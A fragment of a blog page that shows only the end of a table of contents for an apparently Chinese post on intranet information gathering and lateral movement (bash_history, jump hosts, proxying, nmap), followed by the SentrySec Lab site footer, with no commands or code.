<ul>
<li class="toc-entry toc-h4"><a href="#-配置文件"># 配置文件</a></li>
<li class="toc-entry toc-h4"><a href="#-bash_history"># bash_history</a></li>
<li class="toc-entry toc-h4"><a href="#-一些自动化搜集脚本"># 一些自动化搜集脚本</a></li>
<li class="toc-entry toc-h4"><a href="#-passwdshadow不推荐"># Passwd&amp;Shadow（不推荐）</a></li>
</ul>
</li>
<li class="toc-entry toc-h3"><a href="#0x03运维机器信息搜集">0x03：运维机器信息搜集</a></li>
</ul>
</li>
<li class="toc-entry toc-h2"><a href="#一局域网里的信息搜集">一：局域网里的信息搜集</a>
<ul>
<li class="toc-entry toc-h3"><a href="#1x01跳板机攻击">1x01：跳板机攻击</a></li>
<li class="toc-entry toc-h3"><a href="#1x02内网代理">1x02：内网代理</a></li>
<li class="toc-entry toc-h3"><a href="#1x03内网穿透">1x03：内网穿透</a></li>
<li class="toc-entry toc-h3"><a href="#1x04内网信息搜集技巧">1x04：内网信息搜集技巧</a>
<ul>
<li class="toc-entry toc-h4"><a href="#-nmap"># nmap</a></li>
</ul>
</li>
</ul>
</li>
<li class="toc-entry toc-h2"><a href="#二典型案例剖析">二：典型案例剖析</a></li>
<li class="toc-entry toc-h2"><a href="#总结">总结</a></li>
<li class="toc-entry toc-h2"><a href="#参考">参考</a></li>
</ul>
    </p>

</div>


    </div><!--/row -->
        
</div><!--/container -->


        <div id="footerwrap">
    <div class="container">
        <div class="row">
            <div class="col-sm-4">
                <div class="col-sm-6">
                  <p class="thuhidden"><strong>入门</strong></p>
                  <p class="thuhidden"><a href="https://github.com/tuna/mirror-web" target="blank"><em>Jekyll</em>源码</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/jekyll/in/linux" target="blank">博客搭建教程</a></p>
                  <p class="thuhidden"><a href="https://about.sentrylab.cn/news/sentry-lab-markdown-usage/" target="blank">个性化语法批注</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/nginx/with/jekyll-site/" target="blank">公网部署</a></p>
                  </div>

                  <div class="col-sm-6">
                  <p class="thuhidden"><strong>社区</strong></p>
                  <p class="thuhidden"><a href="/blog" target="blank">博客</a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger/tree/master/CoVV" target="blank"><em>Collection of verified vulnerabilities</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger" target="blank"><em>Bigger than Bigger</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/B4xinSynchronize" target="blank"><em>B4xinSynchronize</em></a></p>
                  </div>
            </div>

        <div class="col-sm-4">
                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>开发</strong></p>
                    <p class="thuhidden"><a href="https://github.com/Bin4xin/Bin4xin" target="blank"><em>Bin4xin</em></a></p>
                    <p class="thuhidden"><a href="https://www.cloudflare.com/waf/" target="blank"><em>CloudFlare WAF</em></a></p>
                    <p class="thuhidden"><a href="https://jekyllrb.com/docs/" target="blank"><em>Jekyll</em></a></p>
                    <p class="thuhidden"><a href="https://www.markdownguide.org/" target="blank"><em>MarkDown</em></a></p>
                    <p class="share">
                    <a href="https://github.com/Bin4xin/" target="blank"><i class="fa fa-github"></i></a>
                    <a href="https://twitter.com/Bin4xin"><i class="fa fa-twitter" target="blank"></i></a>
                    <a href="#"><i class="fa fa-facebook" target="blank"></i></a>
                    </p>
                  </div>

                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>关于</strong></p>
                    <p class="thuhidden"><a href="https://about.sentrylab.cn/" target="blank">近期研究</a></p>
                    <p class="thuhidden">∑ <csmall>(Visitors/times)</csmall></em></p>
                    <img src="https://profile-counter.glitch.me/bin4xin.github.io/count.svg" style="max-width:100%;">
                  </div>
            </div>

        <div class="col-sm-4">
          
          <picture>
  <img src="/assets/img/logo-small@3x.jpg" srcset="/assets/img/logo-small@3x.png 1x" />
  </picture>

        </div>
        </div><!--/row -->
      <p class="thuhidden">© 2019-2021 SentrySec, Lab. Build by Jekyll under the terms of the MIT License.</p>
    </div><!--/container -->
</div><!--/footerwrap -->
    </body>
</html>